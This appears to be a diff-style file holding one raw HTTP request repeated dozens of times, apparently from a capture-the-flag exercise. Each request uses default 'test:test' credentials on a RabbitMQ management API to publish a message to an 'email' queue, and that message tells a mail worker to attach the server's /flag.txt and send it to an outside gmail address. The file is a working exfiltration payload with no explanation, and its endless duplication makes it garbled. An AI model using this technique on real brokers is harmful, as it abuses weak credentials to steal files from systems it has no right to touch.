+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"xxxxxxxxxxx@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
